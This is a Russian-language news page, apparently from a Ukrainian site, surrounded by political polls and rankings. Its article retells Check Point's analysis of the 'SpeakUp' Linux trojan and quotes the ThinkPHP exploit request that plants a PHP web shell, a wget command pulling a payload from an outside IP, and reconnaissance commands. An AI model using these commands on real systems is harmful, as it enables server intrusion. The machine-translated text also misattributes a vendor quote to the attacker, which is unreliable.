Нежность на грани соблазна — имидж, в котором она живет и поет. Голос Мяты завораживает, а ее песни вдохновляют. Своим творчеством Мята доказывает, что украинская музыка качественная, модная и интересная!
Во фракции "Слуга народа" раздаются призывы остановить эскалацию и начать мирные переговоры с Россией. Как нам лучше поступить?
голосов
Погода
Узнай прогноз для твоего города
Обновлено по состоянию на
Курс валют на сегодня
Узнайте актуальную информацию по состоянию на
18.01.2026
ТОП-5 САМЫХ БОГАТЫХ МЭРОВ - ДАННЫЕ ИЗ ДЕКЛАРАЦИЙ (млн. грн.)
1
Терехов, Харьков
2,000
2
Бондаренко, Черкассы
1,342
3
Кличко, Киев
1,233
4
Андреев, Ужгород
1,182
5
Мрочко, Херсон
1,148
Трамп - это второй Янукович
Информатор доказывает, почему это не просто слова
ТОП-7 самых дорогих брендов мира по версии VisualCapitalist
1
Apple
$516 млрд.
2
Microsoft
$340 млрд.
3
Google
$333,4 млрд.
4
Amazon
$308,9 млрд.
5
Samsung
$99,4 млрд.
6
Wal,art
$96,8
7
TikTok
$84,2 млрд.
Трамп требует, чтобы Украина согласилась на невыгодный мир. Как нам быть?
голосов
Залужный будет молчать
Против эксглавкома имеются уголовные производства
Кабмин решил дать 10% надбавки к зарплате за знание английского
Вы начнете учить английский?
голосов
ТОП-5 ПОЛИТИКОВ УКРАИНЫ С НАИВЫСШИМ РЕЙТИНГМ
По опросу SOCIS 21 января 2025 года
1
Залужный
36,1%
2
Зеленский
24,3%
3
Порошенко
9,4%
4
Разумков
8,3%
5
Тимошенко
6%
САМЫЙ СТИЛЬНЫЙ ИЗ ЗАСТРОЙЩИКОВ КИЕВА
Что известно об Игоре Никонове
Россия снова фабрикует фейки
Cуджанцы рассказали Информатору, как Кремль придумал массовые убийства в Русском Поречном
Це ж було вже!
Почему, как и перед началом вторжения, о конце войны пишут на Западе, а Киев все отрицает
Неужели история действительно циклическая или украинская власть ничего не научила?
ТОП-10 украинских министров с самыми большими зарплатами в 2024 году
1
Р. УМЕРОВ, министр обороны
1,623 млн.
2
Г.Галущенко, министр энергетики
1,594 млн.
3
И.КЛИМЕНКО, МВД
1,561 млн.
4
В. ЛЯШКО, МОЗ
1,536 млн.
5
М. БІДНИЙ, министр молодежи
1,443 млн.
6
С.МАРЧЕНКО, министр финансов
1,437 млн.
7
О.ЛИСОВОЙ, министр образования
1,403 млн.
8
О.ЖОЛНОВИЧ, Минсоцполитики
1,390 млн.
9
О.НЕМЧІНОВ, министр КМУ
1,237 млн.
10
А.СИБИГА, МИД
1,234 млн.
Актуальный курс криптовалют
BINANCE COIN (BNB)
946.69
DOGECOIN (DOGE)
0.14
THETA (THETA)
0.33
LITECOIN (LTC)
74.81
BITCOIN (BTC)
95120.15
Теория рукопожатий
В Киеве ТРЦ Gulliver объединил Валерия Залужного и Дмитрия Медведева
ПЯТЕРКА САМЫХ БОГАТЫХ В МИРЕ
По версии Bloomberg
1
Илон Маск
$432 млрд
2
Джефф Безос
$239 млрд
3
Марк Цукерберг
$207 млрд
4
Ларри Элисон
$192 млрд
5
Бернар Арно
$176 млрд
Как Минюст упустил кибератаку
Об уязвимости реестров знали еще осенью 2020 года
Более 1000 дней прошло с начала полномасштабного вторжения
Как вы считаете, сколько еще будет продолжаться война?
голосов
Это лохотрон, а не эвакуация!
Репортаж Информатора из Сумской области, где из-за обстрелов принудительно эвакуируют жителей
Вместо родного дома - невыносимые условия, одноразовое питание и отсутствие денег
Жители Курской области: для Путина мы никто
РЕПОРТАЖ ИНФОРМАТОРА ИЗ СУДЖИ
Как Игорь Рец выжил на тропе ухилянтов из Закарпатья в Румынию
Корреспондент Информатора забрался на высокогорье Карпат и провел неделю в убежище для туристов, чтобы взять интервью у ухилянтов; на своем пути он встретил пограничников, а также столкнулся с многочисленными нарушениями закона
Путешествие Игоря закончилось в ТЦК и СП Хуста, откуда, как говорят, одна дорога - в учебку, а потом на фронт. Итогом поездки стал подробный отчет о приключениях. Мы публикуем его в нескольких частях
Подземная тюрьма ТЦК в Закарпатье
История Александра Литвина
Человека с бронью из Днепра задержали возле Говерлы, обвинили в попытке незаконного пересечения границы и удерживали в ТЦК городка Хуст
ТОП-10 самых мощных экономик мира
По данным Всемирного банка
1
США
$27 360,935 млрд.
2
Китай
$17 794,782 млрд
3
Германия
$4 456,081 млрд.
4
Япония
$ 4 212,945 млрд.
5
Индия
$3 549,919 млрд.
6
Великобритания
$3 340,032 млрд.
7
Франция
$3 030,904 млрд.
8
Италия
$2 254,851 млрд.
9
Бразилия
$2 173,666 млрд.
10
Канада
$2 140,086 млрд.
Поджег авто ЗСУ
Кому именно спецслужбы РФ через ресурсы по трудоустройству предлагают легкие деньги за преступление против обороны страны: расследование Информатора
Под видом человека, ищущего быстрый заработок, наш корреспондент Игорь Рец пообщался в соцсетях с российскими вербовщиками и сделал выводы, которые могут быть полезны для безопасности ваших детей и друзей
Кулинарный рецепт от Информатора
Кевин Костнер нарушил свои принципы питания: оно того стоило
Кевин Костнер даже в свои годы выглядит невероятно, все благодаря занятиям спортом и системе питания, которой он следует очень давно. Она ориентирована на сытные, но здоровые блюда, дающие ему энергию. Сладкие блюда исключены из рациона актера, но он очень их любит.
Аналитики из Check Point Research обнаружили новый вид вируса-трояна в системах Linux
Check Point Research обнаружила новую компанию, использующую серверы Linux для внедрения нового трояна. Вирус, получивший название “SpeakUp”, использует известные уязвимости в установке и распространении ПО для Linux. Атака была нацелена на серверы по всему миру, включая устройства, размещенные на Amazon Web Services. Исследователи из Check Point обнаружили новый вирус, использующий серверы Linux для внедрения нового Backdoor, который обходит всех поставщиков систем безопасности. Новый троян, названный “SpeakUp”, использует известные уязвимости в шести различных дистрибутивах Linux. Атака набирает обороты и нацелена на серверы в Восточной Азии и Латинской Америке. Об этом сообщает Информатор Tech, ссылаясь на Research.Checkpoint. SpeakUp действует для внутреннего распространения в зараженной подсети и за ее пределами для новых IP-адресов, используя уязвимости удаленного выполнения кода. Кроме того, в SpeakUp появилась возможность заражать устройства системы Mac. Хотя личность действующего лица, ответственного за эту новую атаку, до сих пор не подтверждена, исследователи Check Point смогли сопоставить некоторые факты и предположить, что автор SpeakUp это в прошлом известный спамер вредоносного ПО - Zettabit. Хотя SpeakUp реализован по-другому, он имеет много общего с манерой составление кода Зеттабита. Территориальное распространение вируса График роста зараженных устройств вирусом SpeakUp Изначально заражение было направленно на недавно обнаруженную уязвимость в ThinkPHP и использовало методы внедрения команд для загрузки оболочки PHP, которая обслуживает и выполняется черный ход Perl. Загрузка и установка вируса проходит в три этапа: 1. Использование CVE-2018-20062 для загрузки оболочки PHP С помощью запроса GET уязвимость удаленного выполнения команд в ThinkPHP (CVE-2018-20062) отправляется на целевой сервер, как показано ниже: s = / index / \ think \ app / invokefunction & function = call_user_func_array & vars [0], = system & vars [1], [], = echo ^ <? php $ action = $ _GET ['module']; system ($ action) ;? ^ >> index.php Эта оболочка выполняет команды, отправленные с помощью параметра «module» в запросе. 2. Обслуживания запасного входа Еще один HTTP-запрос отправляется на целевой сервер со следующим ресурсом: /? module = wget hxxp: // 67 [.], 209.177.163 / ibus -O / tmp / e3ac24a0bcddfacd010a6c10f4a814bc Приведенный выше стандартный запрос извлекает полезную нагрузку ibus и сохраняет ее в / tmp / e3ac24a0bcddfacd010a6c10f4a814bc 3. Запуск бэкдора Выполнение происходит с использованием дополнительного HTTP-запроса: /? module = perl / tmp / e3ac24a0bcddfacd010a6c10f4a814bc ; sleep 2; rm -rf / tmp / e3ac24a0bcddfacd010a6c10f4a814bc
Это выполняет сценарий perl, переводит его в спящий режим на две секунды и удаляет файл, чтобы удалить все доказательства.
Защита вируса
Анализируемая выборка была обнаружена у устройства, находящегося в Китае 14 января 2019 года и впервые была отправлена в VirusTotal 9 января 2019 года. На момент написания этой статьи она не обнаруживалась в VT. Отсутствие SpeakUp в базе Virus Total Также весьма интересно, что автор вредоносного ПО зашифровал второй этап загрузки через base64, что обезопасило его от первичного выявления вируса. К несчастью, связь с C&C также была закодирована с той же комбинацией. Выявленные данные содержат несколько доменов, IP-адресов и других уникальных параметров, а также полезные данные второго этапа и дополнительные модули. В приведенном ниже анализе будут показаны различные функции и модули, которые троянец выполняет на компьютере жертвы. Регистрация SpeakUp использует запросы POST и GET через HTTP для связи со своим основным C&C, который является взломанным сайтом speakupomaha [.], Com. Первый пакет POST отправляет идентификатор жертвы и дополнительную информацию, например текущую версию установленного сценария вируса. (В настоящее время 1.0.4). Первым ответом C & C является «needrgr», что означает, что зараженная жертва является новой для сервера и нуждается в регистрации. После этого троянец выдает "полную информацию" о машине, выполняя следующие команды LINUX:
Uname (-r, -v, -m, -n, -a, -s)
Whoami
Ifconfig –a
Arp –a
cat / proc / cpuinfo grep -c "cpu family" 2> & 1
who –b
Процесс регистрации и вводные команды
Основные функции SpeakUp
После завершения процесса регистрации SpeakUp постоянно связывается с компьютером для новых задач с фиксированным интервалом. Постинфекционный трафик Как только жертва успешно зарегистрирована, C&C начинает посылать новые задачи. Большинство из них манипулируют машиной для загрузки и запуска различных файлов. В настоящий момент SpeakUp обслуживает майнеров XMRig для прослушивания зараженных серверов. Согласно XMRHunter, в кошельках хранится ~ 107 монет Монеро. SpeakUp получает дополнительные команды для выполнения, на этот раз в виде простого текста SpeakUp также оснащает свои бэкдоры i (sic), скриптом на python, который позволяет бэкдору сканировать и заражать больше серверов Linux во внутренних и внешних подсетях. Идентификация атакующего и ведущие Внутри скрипта ibus мы видим краткое описание клиента IBus для GNU Emacs. Клиент IBus является многоязычным входом фреймворка с открытым исходным кодом для Linux и ОС Unix. Хотя он поддерживает все языки, в которых не используются латинские буквы, похоже, что основная аудитория - это азиатские пользователи. Описание и имя файла - единственные элементы, которые связывают SpeakUp с платформой Ibus, его содержание не имеет ничего общего с Ibus. Тем самым из этого можно предположить связь между SpeakUp и Восточной Азией.
Заключение
Нагрузка и техника распространения SpeakUp, вне всякого сомнения, создает большую угрозу для ПК. Трудно представить, чтобы кто-нибудь создал такой сложный массив полезных нагрузок, чтобы развернуть несколько майнеров. Хакер, стоящий за этой кампанией, может в любой момент развернуть дополнительные полезные нагрузки, потенциально более навязчивые и опасные. Он имеет возможность сканировать окружающую сеть зараженного сервера и распространять вредоносное ПО. Эта кампания, хотя и является относительно новой, может развиться во что-то большее и потенциально более вредное. Действительно, субъект угрозы, стоящий за этой кампанией, сам Зеттабитф, приводит некоторые “слова мудрости” в отношении вируса: "CloudGuard IaaS - это передовая технология предотвращения угроз, защищающая от облачной инфраструктуры, включая новые трояны, такие как SpeakUp. Но кому от этого легче? Конечно хакер этими действиями побудит разработчикам к закрытию многих дыр, но сколько подобных оплошностей еще можно будет найти в системе?" Ранее мы сообщали о том, что хакеры взломали корпоративную сеть Airbus. Также писали о сливе в сеть имен победителей Грэмми.